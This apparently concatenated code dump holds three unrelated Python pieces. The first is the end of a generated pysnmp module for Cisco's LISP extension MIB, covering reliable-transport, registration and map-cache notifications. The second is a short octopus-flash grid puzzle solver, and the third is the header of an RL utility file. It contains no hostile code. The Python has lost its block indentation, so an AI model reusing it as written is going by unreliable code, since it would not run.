if mibBuilder.loadTexts: clispExtReliableTransportSessionBytesOut.setStatus('current')
if mibBuilder.loadTexts: clispExtReliableTransportSessionBytesOut.setDescription('This object indicates the number of bytes sent on this reliable transport session.')
clispExtGlobalStatsTable = MibTable((1, 3, 6, 1, 4, 1, 9, 9, 825, 1, 4), )
if mibBuilder.loadTexts: clispExtGlobalStatsTable.setStatus('current')
if mibBuilder.loadTexts: clispExtGlobalStatsTable.setDescription('This table lists statistic to augment the lispGlobalStatsTable.')
clispExtGlobalStatsEntry = MibTableRow((1, 3, 6, 1, 4, 1, 9, 9, 825, 1, 4, 1), )
lispGlobalStatsEntry.registerAugmentions(("CISCO-LISP-EXT-MIB", "clispExtGlobalStatsEntry"))
clispExtGlobalStatsEntry.setIndexNames(*lispGlobalStatsEntry.getIndexNames())
if mibBuilder.loadTexts: clispExtGlobalStatsEntry.setStatus('current')
if mibBuilder.loadTexts: clispExtGlobalStatsEntry.setDescription('An entry containing additional global statistics information.')
clispExtGlobalStatsEidRegMoreSpecificEntryCount = MibTableColumn((1, 3, 6, 1, 4, 1, 9, 9, 825, 1, 4, 1, 1), Unsigned32()).setMaxAccess("readonly")
if mibBuilder.loadTexts: clispExtGlobalStatsEidRegMoreSpecificEntryCount.setStatus('current')
if mibBuilder.loadTexts: clispExtGlobalStatsEidRegMoreSpecificEntryCount.setDescription('This object indicates the number of EID prefix registration that are accepted as a result of the accept-more-specific configuration.')
clispExtFeaturesTable = MibTable((1, 3, 6, 1, 4, 1, 9, 9, 825, 1, 5), )
if mibBuilder.loadTexts: clispExtFeaturesTable.setStatus('current')
if mibBuilder.loadTexts: clispExtFeaturesTable.setDescription('This table contains additional LISP feature entries for lispFeaturesTable.')
clispExtFeaturesEntry = MibTableRow((1, 3, 6, 1, 4, 1, 9, 9, 825, 1, 5, 1), )
lispFeaturesEntry.registerAugmentions(("CISCO-LISP-EXT-MIB", "clispExtFeaturesEntry"))
clispExtFeaturesEntry.setIndexNames(*lispFeaturesEntry.getIndexNames())
if mibBuilder.loadTexts: clispExtFeaturesEntry.setStatus('current')
if mibBuilder.loadTexts: clispExtFeaturesEntry.setDescription('An entry containing additional LISP feature information.')
clispExtFeaturesEidRegMoreSpecificWarningThreshold = MibTableColumn((1, 3, 6, 1, 4, 1, 9, 9, 825, 1, 5, 1, 1), Unsigned32()).setMaxAccess("readonly")
if mibBuilder.loadTexts: clispExtFeaturesEidRegMoreSpecificWarningThreshold.setStatus('current')
if mibBuilder.loadTexts: clispExtFeaturesEidRegMoreSpecificWarningThreshold.setDescription('This object indicates the warning threshold for the accept-more-specific registration count on the map-server.')
clispExtFeaturesEidRegMoreSpecificLimit = MibTableColumn((1, 3, 6, 1, 4, 1, 9, 9, 825, 1, 5, 1, 2), Unsigned32()).setMaxAccess("readonly")
if mibBuilder.loadTexts: clispExtFeaturesEidRegMoreSpecificLimit.setStatus('current')
if mibBuilder.loadTexts: clispExtFeaturesEidRegMoreSpecificLimit.setDescription('This object indicates the accept-more-specific registration limit on the map-server.')
clispExtFeaturesMapCacheWarningThreshold = MibTableColumn((1, 3, 6, 1, 4, 1, 9, 9, 825, 1, 5, 1, 3), Unsigned32()).setMaxAccess("readonly")
if mibBuilder.loadTexts: clispExtFeaturesMapCacheWarningThreshold.setStatus('current')
if mibBuilder.loadTexts: clispExtFeaturesMapCacheWarningThreshold.setDescription('This object indicates the map-cache warning threshold on the xTR.')
clispExtNotificationObjects = MibIdentifier((1, 3, 6, 1, 4, 1, 9, 9, 825, 1, 6))
clispExtEidRegFailureCause = MibScalar((1, 3, 6, 1, 4, 1, 9, 9, 825, 1, 6, 1), Integer32().subtype(subtypeSpec=ConstraintsUnion(SingleValueConstraint(1, 2, 3))).clone(namedValues=NamedValues(("noEidPrefixConfiguration", 1), ("authenticationFailure", 2), ("allowedLocatorMismatch", 3)))).setMaxAccess("accessiblefornotify")
if mibBuilder.loadTexts: clispExtEidRegFailureCause.setStatus('current')
if mibBuilder.loadTexts: clispExtEidRegFailureCause.setDescription("This object indicates the cause of the map registration failure on the map-server. 'noEidPrefixConfiguration' No site configuration to accept registration for EID prefix. 'authenticationFailure' Failed to authenticate map-register for EID prefix. 'allowedLocatorMismatch' map-register contains RLOC that is not in the site's allowed locator list.")
clispExtEidRegMapRequestDroppedCause = MibScalar((1, 3, 6, 1, 4, 1, 9, 9, 825, 1, 6, 2), Integer32().subtype(subtypeSpec=ConstraintsUnion(SingleValueConstraint(1, 2, 3))).clone(namedValues=NamedValues(("malformedRequest", 1), ("noMatchingEidRegistration", 2), ("allowedLocatorPolicyViolation", 3)))).setMaxAccess("accessiblefornotify")
if mibBuilder.loadTexts: clispExtEidRegMapRequestDroppedCause.setStatus('current')
if mibBuilder.loadTexts: clispExtEidRegMapRequestDroppedCause.setDescription("This object indicates the cause of the map-request drop on the map-resolver. 'malformedRequest' map-request is not valid. 'noMatchingEidRegistration' could not find matching EID registration for the map-request. 'allowedLocatorPolicyViolation' map request does not conform to the configured allowed-locator policy.")
clispExtGlobalObjects = MibIdentifier((1, 3, 6, 1, 4, 1, 9, 9, 825, 1, 7))
clispExtEidRegMoreSpecificWarningThreshold = MibScalar((1, 3, 6, 1, 4, 1, 9, 9, 825, 1, 7, 1), Unsigned32()).setMaxAccess("readonly")
if mibBuilder.loadTexts: clispExtEidRegMoreSpecificWarningThreshold.setStatus('current')
if mibBuilder.loadTexts: clispExtEidRegMoreSpecificWarningThreshold.setDescription('This object indicates the warning threshold for the accept-more-specific registration count on the map-server. This warning threshold is applicable to all EID instances.')
clispExtEidRegMoreSpecificLimit = MibScalar((1, 3, 6, 1, 4, 1, 9, 9, 825, 1, 7, 2), Unsigned32()).setMaxAccess("readonly")
if mibBuilder.loadTexts: clispExtEidRegMoreSpecificLimit.setStatus('current')
if mibBuilder.loadTexts: clispExtEidRegMoreSpecificLimit.setDescription('This object indicates the accept-more-specific registration limit on the map-server. This is applicable to all EID instances.')
clispExtEidRegMoreSpecificCount = MibScalar((1, 3, 6, 1, 4, 1, 9, 9, 825, 1, 7, 3), Unsigned32()).setMaxAccess("readonly")
if mibBuilder.loadTexts: clispExtEidRegMoreSpecificCount.setStatus('current')
if mibBuilder.loadTexts: clispExtEidRegMoreSpecificCount.setDescription('This object indicates the number of map registrations accepted as a result of accept-more-specific configuration. This is applicable to all EID instances.')
clispExtUseMapResolverStateChange = NotificationType((1, 3, 6, 1, 4, 1, 9, 9, 825, 0, 1)).setObjects(("LISP-MIB", "lispUseMapResolverState"))
if mibBuilder.loadTexts: clispExtUseMapResolverStateChange.setStatus('current')
if mibBuilder.loadTexts: clispExtUseMapResolverStateChange.setDescription('The device generates this notification when the map-resolver reachability state changes. The lispUseMapResolverAddressLength and lispUseMapResolverAddress values are attached to the notification object ID.')
clispExtReliableTransportStateChange = NotificationType((1, 3, 6, 1, 4, 1, 9, 9, 825, 0, 2)).setObjects(("CISCO-LISP-EXT-MIB", "clispExtReliableTransportSessionState"))
if mibBuilder.loadTexts: clispExtReliableTransportStateChange.setStatus('current')
if mibBuilder.loadTexts: clispExtReliableTransportStateChange.setDescription('The device generates this notification when the reliable transport session state changes. The clispReliableTransportSessionPeerAddressLength, clispReliableTransportSessionPeerAddress, clispReliableTransportSessionPeerPort, clispReliableTransportSessionLocalAddressLength, clispReliableTransportSessionLocalAddress, clispReliableTransportSessionLocalPort values are attached to the notification object ID.')
clispExtMappingDatabaseEidRegFailure = NotificationType((1, 3, 6, 1, 4, 1, 9, 9, 825, 0, 3)).setObjects(("LISP-MIB", "lispMappingDatabaseTimeStamp"), ("LISP-MIB", "lispUseMapServerState"))
if mibBuilder.loadTexts: clispExtMappingDatabaseEidRegFailure.setStatus('current')
if mibBuilder.loadTexts: clispExtMappingDatabaseEidRegFailure.setDescription('The device generates this notification when the xTR fails to register a database mapping with the map-server. The lispMappingDatabaseEidLength, lispMappingDatabaseEid, lispUseMapServerAddressLength, lispUseMapServerAddress values are attached to the notification object ID.')
clispExtUseMapServerStateChange = NotificationType((1, 3, 6, 1, 4, 1, 9, 9, 825, 0, 4)).setObjects(("LISP-MIB", "lispUseMapServerState"))
if mibBuilder.loadTexts: clispExtUseMapServerStateChange.setStatus('current')
if mibBuilder.loadTexts: clispExtUseMapServerStateChange.setDescription('The device generates this notification when the map-server reachability state changes. The lispUseMapServerAddressLength and lispUseMapServerAddress values are attached to the notification object ID.')
clispExtUseProxyEtrStateChange = NotificationType((1, 3, 6, 1, 4, 1, 9, 9, 825, 0, 5)).setObjects(("LISP-MIB", "lispUseProxyEtrState"))
if mibBuilder.loadTexts: clispExtUseProxyEtrStateChange.setStatus('current')
if mibBuilder.loadTexts: clispExtUseProxyEtrStateChange.setDescription('The device generates this notification when the proxy ETR reachability state changes. The lispUseProxyEtrAddressLength and lispUseProxyEtrAddress values are attached to the notification object ID.')
clispExtEidRegSiteAllRegistrationsExpired = NotificationType((1, 3, 6, 1, 4, 1, 9, 9, 825, 0, 6)).setObjects(("LISP-MIB", "lispEidRegistrationSiteName"))
if mibBuilder.loadTexts: clispExtEidRegSiteAllRegistrationsExpired.setStatus('current')
if mibBuilder.loadTexts: clispExtEidRegSiteAllRegistrationsExpired.setDescription('The device generates this notification when all the registration for a site expires on the map-server. The lispEidRegistrationEidLength and lispEidRegistrationEid values are attached to the notification object ID.')
clispExtEidRegFailure = NotificationType((1, 3, 6, 1, 4, 1, 9, 9, 825, 0, 7)).setObjects(("LISP-MIB", "lispEidRegistrationSiteName"), ("CISCO-LISP-EXT-MIB", "clispExtEidRegFailureCause"))
if mibBuilder.loadTexts: clispExtEidRegFailure.setStatus('current')
if mibBuilder.loadTexts: clispExtEidRegFailure.setDescription('The device generates this notification when the map-server fails to accept a map registration. The lispEidRegistrationEidLength and lispEidRegistrationEid values are attached to the notification object ID. If clispExtEidRegFailureCause value is noEidPrefixConfiguration(1) the lispEidRegistrationSiteName object in the notification will be empty.')
clispExtFeaturesEidRegMoreSpecificLimitReached = NotificationType((1, 3, 6, 1, 4, 1, 9, 9, 825, 0, 8)).setObjects(("CISCO-LISP-EXT-MIB", "clispExtFeaturesEidRegMoreSpecificLimit"))
if mibBuilder.loadTexts: clispExtFeaturesEidRegMoreSpecificLimitReached.setStatus('current')
if mibBuilder.loadTexts: clispExtFeaturesEidRegMoreSpecificLimitReached.setDescription('The device generates this notification when the map-server has reached the limit of the number of map registrations it can accept as a result of the accept-more-specific configuration. This notification is instance specific. The lispFeaturesInstanceID and lispFeaturesAddressFamily values are attached to the notification object ID.')
clispExtFeaturesEidRegMoreSpecificWarningThresholdReached = NotificationType((1, 3, 6, 1, 4, 1, 9, 9, 825, 0, 9)).setObjects(("CISCO-LISP-EXT-MIB", "clispExtFeaturesEidRegMoreSpecificWarningThreshold"))
if mibBuilder.loadTexts: clispExtFeaturesEidRegMoreSpecificWarningThresholdReached.setStatus('current')
if mibBuilder.loadTexts: clispExtFeaturesEidRegMoreSpecificWarningThresholdReached.setDescription('The device generates this notification when the map-server has reached the threshold of the number of map registrations it can accept as a result of accept-more-specific configuration. This notification is instance specific. The lispFeaturesInstanceID and lispFeaturesAddressFamily values are attached to the notification object ID.')
clispExtEidRegMapRequestDropped = NotificationType((1, 3, 6, 1, 4, 1, 9, 9, 825, 0, 10)).setObjects(("LISP-MIB", "lispEidRegistrationSiteName"), ("CISCO-LISP-EXT-MIB", "clispExtEidRegMapRequestDroppedCause"))
if mibBuilder.loadTexts: clispExtEidRegMapRequestDropped.setStatus('current')
if mibBuilder.loadTexts: clispExtEidRegMapRequestDropped.setDescription('The device generates this notification when the map-resolver drops a map-request because the map-request does not conform to configured policy. The lispEidRegistrationEidLength and lispEidRegistrationEid values are attached to the notification object ID.')
clispExtEidRegMoreSpecificLimitReached = NotificationType((1, 3, 6, 1, 4, 1, 9, 9, 825, 0, 11)).setObjects(("CISCO-LISP-EXT-MIB", "clispExtEidRegMoreSpecificLimit"))
if mibBuilder.loadTexts: clispExtEidRegMoreSpecificLimitReached.setStatus('current')
if mibBuilder.loadTexts: clispExtEidRegMoreSpecificLimitReached.setDescription('The device generates this notification when the map-server has reached the limit of the number of map registrations it can accept as a result of the accept-more-specific configuration. This notification is router LISP instance specific.')
clispExtEidRegMoreSpecificWarningThresholdReached = NotificationType((1, 3, 6, 1, 4, 1, 9, 9, 825, 0, 12)).setObjects(("CISCO-LISP-EXT-MIB", "clispExtEidRegMoreSpecificWarningThreshold"))
if mibBuilder.loadTexts: clispExtEidRegMoreSpecificWarningThresholdReached.setStatus('current')
if mibBuilder.loadTexts: clispExtEidRegMoreSpecificWarningThresholdReached.setDescription('The device generates this notification when the map-server has reached the threshold of the number of map registrations it can accept as a result of accept-more-specific configuration. This notification is router LISP instance specific.')
clispExtFeaturesMapCacheLimitReached = NotificationType((1, 3, 6, 1, 4, 1, 9, 9, 825, 0, 13)).setObjects(("LISP-MIB", "lispFeaturesMapCacheLimit"))
if mibBuilder.loadTexts: clispExtFeaturesMapCacheLimitReached.setStatus('current')
if mibBuilder.loadTexts: clispExtFeaturesMapCacheLimitReached.setDescription('The device generates this notification when the xTR has reached the limit of the number of map-cache it can create. This notification is instance specific. The lispFeaturesInstanceID and lispFeaturesAddressFamily values are attached to the notification object ID.')
clispExtFeaturesMapCacheWarningThresholdReached = NotificationType((1, 3, 6, 1, 4, 1, 9, 9, 825, 0, 14)).setObjects(("CISCO-LISP-EXT-MIB", "clispExtFeaturesMapCacheWarningThreshold"))
if mibBuilder.loadTexts: clispExtFeaturesMapCacheWarningThresholdReached.setStatus('current')
if mibBuilder.loadTexts: clispExtFeaturesMapCacheWarningThresholdReached.setDescription('The device generates this notification when the xTR has reached the threshold of the number of map-cache it can create. This notification is instance specific. The lispFeaturesInstanceID and lispFeaturesAddressFamily values are attached to the notification object ID.')
ciscoLispExtCompliances = MibIdentifier((1, 3, 6, 1, 4, 1, 9, 9, 825, 2, 1))
ciscoLispExtGroups = MibIdentifier((1, 3, 6, 1, 4, 1, 9, 9, 825, 2, 2))
ciscoLispExtMIBComplianceAll = ModuleCompliance((1, 3, 6, 1, 4, 1, 9, 9, 825, 2, 1, 1)).setObjects(("CISCO-LISP-EXT-MIB", "clispExtRlocMembershipGroup"), ("CISCO-LISP-EXT-MIB", "clispExtReliableTransportSessionGroup"), ("CISCO-LISP-EXT-MIB", "clispExtNotificationsGroup"), ("CISCO-LISP-EXT-MIB", "clispExtGlobalStatsGroup"), ("CISCO-LISP-EXT-MIB", "clispExtFeaturesGroup"), ("CISCO-LISP-EXT-MIB", "clispExtNotificationSupportGroup"), ("CISCO-LISP-EXT-MIB", "clispExtEidRegMoreSpecificValuesGroup"))
if getattr(mibBuilder, 'version', (0, 0, 0)) > (4, 4, 0):
ciscoLispExtMIBComplianceAll = ciscoLispExtMIBComplianceAll.setStatus('current')
if mibBuilder.loadTexts: ciscoLispExtMIBComplianceAll.setDescription('Compliance requirement for implementations of CISCO-LISP-EXT-MIB by all LISP (P)xTR devices. Map-server database of gleaned RLOC addresses only need to be supported on LISP Map Server.')
ciscoLispExtMIBComplianceMapServer = ModuleCompliance((1, 3, 6, 1, 4, 1, 9, 9, 825, 2, 1, 2)).setObjects(("CISCO-LISP-EXT-MIB", "clispExtEidRegRlocMembershipGroup"), ("CISCO-LISP-EXT-MIB", "clispExtReliableTransportSessionGroup"), ("CISCO-LISP-EXT-MIB", "clispExtNotificationsGroup"), ("CISCO-LISP-EXT-MIB", "clispExtGlobalStatsGroup"), ("CISCO-LISP-EXT-MIB", "clispExtFeaturesGroup"), ("CISCO-LISP-EXT-MIB", "clispExtNotificationSupportGroup"), ("CISCO-LISP-EXT-MIB", "clispExtEidRegMoreSpecificValuesGroup"))
if getattr(mibBuilder, 'version', (0, 0, 0)) > (4, 4, 0):
ciscoLispExtMIBComplianceMapServer = ciscoLispExtMIBComplianceMapServer.setStatus('current')
if mibBuilder.loadTexts: ciscoLispExtMIBComplianceMapServer.setDescription('Compliance requirement for implementations of CISCO-LISP-EXT-MIB by LISP Map Server devices.')
clispExtNotificationsGroup = NotificationGroup((1, 3, 6, 1, 4, 1, 9, 9, 825, 2, 2, 1)).setObjects(("CISCO-LISP-EXT-MIB", "clispExtUseMapResolverStateChange"), ("CISCO-LISP-EXT-MIB", "clispExtReliableTransportStateChange"), ("CISCO-LISP-EXT-MIB", "clispExtMappingDatabaseEidRegFailure"), ("CISCO-LISP-EXT-MIB", "clispExtUseMapServerStateChange"), ("CISCO-LISP-EXT-MIB", "clispExtUseProxyEtrStateChange"), ("CISCO-LISP-EXT-MIB", "clispExtEidRegSiteAllRegistrationsExpired"), ("CISCO-LISP-EXT-MIB", "clispExtEidRegFailure"), ("CISCO-LISP-EXT-MIB", "clispExtEidRegMoreSpecificLimitReached"), ("CISCO-LISP-EXT-MIB", "clispExtEidRegMoreSpecificWarningThresholdReached"), ("CISCO-LISP-EXT-MIB", "clispExtEidRegMapRequestDropped"), ("CISCO-LISP-EXT-MIB", "clispExtFeaturesEidRegMoreSpecificLimitReached"), ("CISCO-LISP-EXT-MIB", "clispExtFeaturesEidRegMoreSpecificWarningThresholdReached"), ("CISCO-LISP-EXT-MIB", "clispExtFeaturesMapCacheLimitReached"), ("CISCO-LISP-EXT-MIB", "clispExtFeaturesMapCacheWarningThresholdReached"))
if getattr(mibBuilder, 'version', (0, 0, 0)) > (4, 4, 0):
clispExtNotificationsGroup = clispExtNotificationsGroup.setStatus('current')
if mibBuilder.loadTexts: clispExtNotificationsGroup.setDescription('Objects required for LISP notifications.')
clispExtEidRegRlocMembershipGroup = ObjectGroup((1, 3, 6, 1, 4, 1, 9, 9, 825, 2, 2, 2)).setObjects(("CISCO-LISP-EXT-MIB", "clispExtEidRegRlocMembershipMemberSince"), ("CISCO-LISP-EXT-MIB", "clispExtEidRegRlocMembershipGleaned"), ("CISCO-LISP-EXT-MIB", "clispExtEidRegRlocMembershipConfigured"))
if getattr(mibBuilder, 'version', (0, 0, 0)) > (4, 4, 0):
clispExtEidRegRlocMembershipGroup = clispExtEidRegRlocMembershipGroup.setStatus('current')
if mibBuilder.loadTexts: clispExtEidRegRlocMembershipGroup.setDescription('A collection of objects to support reporting MapServer database of RLOC membership.')
clispExtRlocMembershipGroup = ObjectGroup((1, 3, 6, 1, 4, 1, 9, 9, 825, 2, 2, 3)).setObjects(("CISCO-LISP-EXT-MIB", "clispExtRlocMembershipMemberSince"), ("CISCO-LISP-EXT-MIB", "clispExtRlocMembershipDiscovered"), ("CISCO-LISP-EXT-MIB", "clispExtRlocMembershipConfigured"))
if getattr(mibBuilder, 'version', (0, 0, 0)) > (4, 4, 0):
clispExtRlocMembershipGroup = clispExtRlocMembershipGroup.setStatus('current')
if mibBuilder.loadTexts: clispExtRlocMembershipGroup.setDescription('A collection of objects to support reporting RLOC membership information.')
clispExtReliableTransportSessionGroup = ObjectGroup((1, 3, 6, 1, 4, 1, 9, 9, 825, 2, 2, 4)).setObjects(("CISCO-LISP-EXT-MIB", "clispExtReliableTransportSessionState"), ("CISCO-LISP-EXT-MIB", "clispExtReliableTransportSessionLastStateChangeTime"), ("CISCO-LISP-EXT-MIB", "clispExtReliableTransportSessionEstablishmentRole"), ("CISCO-LISP-EXT-MIB", "clispExtReliableTransportSessionMessagesIn"), ("CISCO-LISP-EXT-MIB", "clispExtReliableTransportSessionMessagesOut"), ("CISCO-LISP-EXT-MIB", "clispExtReliableTransportSessionBytesIn"), ("CISCO-LISP-EXT-MIB", "clispExtReliableTransportSessionBytesOut"))
if getattr(mibBuilder, 'version', (0, 0, 0)) > (4, 4, 0):
clispExtReliableTransportSessionGroup = clispExtReliableTransportSessionGroup.setStatus('current')
if mibBuilder.loadTexts: clispExtReliableTransportSessionGroup.setDescription('A collection of objects to support reporting \\ ReliableTransportSession information.')
clispExtGlobalStatsGroup = ObjectGroup((1, 3, 6, 1, 4, 1, 9, 9, 825, 2, 2, 5)).setObjects(("CISCO-LISP-EXT-MIB", "clispExtGlobalStatsEidRegMoreSpecificEntryCount"))
if getattr(mibBuilder, 'version', (0, 0, 0)) > (4, 4, 0):
clispExtGlobalStatsGroup = clispExtGlobalStatsGroup.setStatus('current')
if mibBuilder.loadTexts: clispExtGlobalStatsGroup.setDescription('A collection of objects to support reporting \\ Cisco define augments to the lispGlobalStatsTable')
clispExtFeaturesGroup = ObjectGroup((1, 3, 6, 1, 4, 1, 9, 9, 825, 2, 2, 6)).setObjects(("CISCO-LISP-EXT-MIB", "clispExtFeaturesEidRegMoreSpecificWarningThreshold"), ("CISCO-LISP-EXT-MIB", "clispExtFeaturesEidRegMoreSpecificLimit"), ("CISCO-LISP-EXT-MIB", "clispExtFeaturesMapCacheWarningThreshold"))
if getattr(mibBuilder, 'version', (0, 0, 0)) > (4, 4, 0):
clispExtFeaturesGroup = clispExtFeaturesGroup.setStatus('current')
if mibBuilder.loadTexts: clispExtFeaturesGroup.setDescription('A collection of objects to support reporting \\ Cisco define augments to the lispFeaturesTable.')
clispExtNotificationSupportGroup = ObjectGroup((1, 3, 6, 1, 4, 1, 9, 9, 825, 2, 2, 7)).setObjects(("CISCO-LISP-EXT-MIB", "clispExtEidRegFailureCause"), ("CISCO-LISP-EXT-MIB", "clispExtEidRegMapRequestDroppedCause"), ("CISCO-LISP-EXT-MIB", "clispExtEidRegMoreSpecificWarningThreshold"), ("CISCO-LISP-EXT-MIB", "clispExtEidRegMoreSpecificLimit"))
if getattr(mibBuilder, 'version', (0, 0, 0)) > (4, 4, 0):
clispExtNotificationSupportGroup = clispExtNotificationSupportGroup.setStatus('current')
if mibBuilder.loadTexts: clispExtNotificationSupportGroup.setDescription('A collection of objects to be supplied within notifications.')
clispExtEidRegMoreSpecificValuesGroup = ObjectGroup((1, 3, 6, 1, 4, 1, 9, 9, 825, 2, 2, 8)).setObjects(("CISCO-LISP-EXT-MIB", "clispExtEidRegMoreSpecificWarningThreshold"), ("CISCO-LISP-EXT-MIB", "clispExtEidRegMoreSpecificLimit"), ("CISCO-LISP-EXT-MIB", "clispExtEidRegMoreSpecificCount"))
if getattr(mibBuilder, 'version', (0, 0, 0)) > (4, 4, 0):
clispExtEidRegMoreSpecificValuesGroup = clispExtEidRegMoreSpecificValuesGroup.setStatus('current')
if mibBuilder.loadTexts: clispExtEidRegMoreSpecificValuesGroup.setDescription('A collection of objects to be supplied within notifications.')
mibBuilder.exportSymbols("CISCO-LISP-EXT-MIB", clispExtReliableTransportSessionLocalPort=clispExtReliableTransportSessionLocalPort, clispExtReliableTransportSessionEntry=clispExtReliableTransportSessionEntry, clispExtNotificationObjects=clispExtNotificationObjects, clispExtFeaturesEntry=clispExtFeaturesEntry, clispExtFeaturesMapCacheLimitReached=clispExtFeaturesMapCacheLimitReached, clispExtMappingDatabaseEidRegFailure=clispExtMappingDatabaseEidRegFailure, clispExtGlobalStatsEntry=clispExtGlobalStatsEntry, clispExtEidRegRlocMembershipConfigured=clispExtEidRegRlocMembershipConfigured, clispExtEidRegRlocMembershipRloc=clispExtEidRegRlocMembershipRloc, clispExtGlobalStatsEidRegMoreSpecificEntryCount=clispExtGlobalStatsEidRegMoreSpecificEntryCount, clispExtGlobalStatsGroup=clispExtGlobalStatsGroup, clispExtFeaturesEidRegMoreSpecificWarningThreshold=clispExtFeaturesEidRegMoreSpecificWarningThreshold, clispExtNotificationSupportGroup=clispExtNotificationSupportGroup, clispExtUseProxyEtrStateChange=clispExtUseProxyEtrStateChange, clispExtUseMapResolverStateChange=clispExtUseMapResolverStateChange, clispExtRlocMembershipTable=clispExtRlocMembershipTable, ciscoLispExtMIBComplianceMapServer=ciscoLispExtMIBComplianceMapServer, ciscoLispExtConformance=ciscoLispExtConformance, ciscoLispExtMIB=ciscoLispExtMIB, clispExtRlocMembershipGroup=clispExtRlocMembershipGroup, clispExtEidRegRlocMembershipEidAfi=clispExtEidRegRlocMembershipEidAfi, clispExtReliableTransportSessionTable=clispExtReliableTransportSessionTable, clispExtFeaturesEidRegMoreSpecificWarningThresholdReached=clispExtFeaturesEidRegMoreSpecificWarningThresholdReached, clispExtReliableTransportSessionPeerAddressLength=clispExtReliableTransportSessionPeerAddressLength, clispExtEidRegMoreSpecificLimitReached=clispExtEidRegMoreSpecificLimitReached, clispExtFeaturesMapCacheWarningThresholdReached=clispExtFeaturesMapCacheWarningThresholdReached, clispExtRlocMembershipEidAfi=clispExtRlocMembershipEidAfi, clispExtEidRegMoreSpecificCount=clispExtEidRegMoreSpecificCount, clispExtEidRegMoreSpecificWarningThresholdReached=clispExtEidRegMoreSpecificWarningThresholdReached, clispExtRlocMembershipInstanceID=clispExtRlocMembershipInstanceID, clispExtEidRegMoreSpecificValuesGroup=clispExtEidRegMoreSpecificValuesGroup, clispExtReliableTransportSessionEstablishmentRole=clispExtReliableTransportSessionEstablishmentRole, clispExtRlocMembershipRlocLength=clispExtRlocMembershipRlocLength, clispExtReliableTransportSessionState=clispExtReliableTransportSessionState, clispExtFeaturesEidRegMoreSpecificLimit=clispExtFeaturesEidRegMoreSpecificLimit, clispExtEidRegRlocMembershipEntry=clispExtEidRegRlocMembershipEntry, clispExtRlocMembershipDiscovered=clispExtRlocMembershipDiscovered, clispExtEidRegFailure=clispExtEidRegFailure, clispExtReliableTransportSessionMessagesOut=clispExtReliableTransportSessionMessagesOut, clispExtRlocMembershipEntry=clispExtRlocMembershipEntry, ciscoLispExtCompliances=ciscoLispExtCompliances, clispExtReliableTransportSessionPeerPort=clispExtReliableTransportSessionPeerPort, clispExtEidRegRlocMembershipRlocLength=clispExtEidRegRlocMembershipRlocLength, ciscoLispExtNotifications=ciscoLispExtNotifications, clispExtRlocMembershipConfigured=clispExtRlocMembershipConfigured, clispExtFeaturesMapCacheWarningThreshold=clispExtFeaturesMapCacheWarningThreshold, clispExtNotificationsGroup=clispExtNotificationsGroup, clispExtUseMapServerStateChange=clispExtUseMapServerStateChange, clispExtEidRegMapRequestDropped=clispExtEidRegMapRequestDropped, clispExtReliableTransportStateChange=clispExtReliableTransportStateChange, clispExtGlobalObjects=clispExtGlobalObjects, clispExtReliableTransportSessionLocalAddressLength=clispExtReliableTransportSessionLocalAddressLength, clispExtEidRegRlocMembershipTable=clispExtEidRegRlocMembershipTable, clispExtEidRegMoreSpecificLimit=clispExtEidRegMoreSpecificLimit, clispExtEidRegSiteAllRegistrationsExpired=clispExtEidRegSiteAllRegistrationsExpired, clispExtEidRegRlocMembershipGroup=clispExtEidRegRlocMembershipGroup, clispExtReliableTransportSessionPeerAddress=clispExtReliableTransportSessionPeerAddress, clispExtFeaturesTable=clispExtFeaturesTable, clispExtFeaturesGroup=clispExtFeaturesGroup, ciscoLispExtGroups=ciscoLispExtGroups, clispExtEidRegMapRequestDroppedCause=clispExtEidRegMapRequestDroppedCause, clispExtEidRegFailureCause=clispExtEidRegFailureCause, clispExtReliableTransportSessionLastStateChangeTime=clispExtReliableTransportSessionLastStateChangeTime, clispExtEidRegRlocMembershipGleaned=clispExtEidRegRlocMembershipGleaned, clispExtEidRegRlocMembershipInstanceID=clispExtEidRegRlocMembershipInstanceID, clispExtRlocMembershipMemberSince=clispExtRlocMembershipMemberSince, clispExtReliableTransportSessionBytesOut=clispExtReliableTransportSessionBytesOut, ciscoLispExtObjects=ciscoLispExtObjects, clispExtReliableTransportSessionBytesIn=clispExtReliableTransportSessionBytesIn, PYSNMP_MODULE_ID=ciscoLispExtMIB, clispExtEidRegRlocMembershipMemberSince=clispExtEidRegRlocMembershipMemberSince, clispExtReliableTransportSessionGroup=clispExtReliableTransportSessionGroup, clispExtReliableTransportSessionLocalAddress=clispExtReliableTransportSessionLocalAddress, clispExtGlobalStatsTable=clispExtGlobalStatsTable, clispExtRlocMembershipRloc=clispExtRlocMembershipRloc, ciscoLispExtMIBComplianceAll=ciscoLispExtMIBComplianceAll, clispExtFeaturesEidRegMoreSpecificLimitReached=clispExtFeaturesEidRegMoreSpecificLimitReached, clispExtReliableTransportSessionMessagesIn=clispExtReliableTransportSessionMessagesIn, clispExtEidRegMoreSpecificWarningThreshold=clispExtEidRegMoreSpecificWarningThreshold)
| 46,214 | 16,242 |
import sys
import numpy as np
raw = sys.stdin.read()
map = np.array([[c for c in l] for l in raw.split('\n') if len(l) != 0], dtype=int)
def energize(map, i, j):
if i >= 0 and j >= 0 and i < map.shape[0] and j < map.shape[1] and map[i, j] < 10:
map[i, j] += 1
if map[i, j] >= 10:
for di, dj in [(di, dj) for di in range(-1, 2) for dj in range(-1, 2) if di != 0 or dj != 0]:
energize(map, i + di, j + dj)
flashes = 0
for _ in range(100):
for i in range(map.shape[0]):
for j in range(map.shape[1]):
energize(map, i, j)
flashes += (map >= 10).sum()
map[map >= 10] = 0
print('Result:', flashes)
| 678 | 295 |
from __future__ import print_function
from collections import OrderedDict, defaultdict
import numpy as np
import random
import copy
#from mpi_util import mpi_moments
#def fc(x, scope, nh, *, init_scale=1.0, init_bias=0.0):
# with tf.variable_scope(scope):
# nin = x.get_shape()[1].value
# w = tf.get_variable("w", [nin, nh], initializer=ortho_init(init_scale))
# b = tf.get_variable("b", [nh], initializer=tf.constant_initializer(init_bias))
# return tf.matmul(x, w)+b
#
#def conv(x, scope, *, nf, rf, stride, pad='VALID', init_scale=1.0, data_format='NHWC', one_dim_bias=False, bias_initializer=tf.constant_initializer(0.0)):
# if data_format == 'NHWC':
# channel_ax = 3
# strides = [1, stride, stride, 1]
# bshape = [1, 1, 1, nf]
# elif data_format == 'NCHW':
# channel_ax = 1
# strides = [1, 1, stride, stride]
# bshape = [1, nf, 1, 1]
# else:
# raise NotImplementedError
# bias_var_shape = [nf] if one_dim_bias else [1, nf, 1, 1]
# nin = x.get_shape()[channel_ax].value
# wshape = [rf, rf, nin, nf]
# with tf.variable_scope(scope):
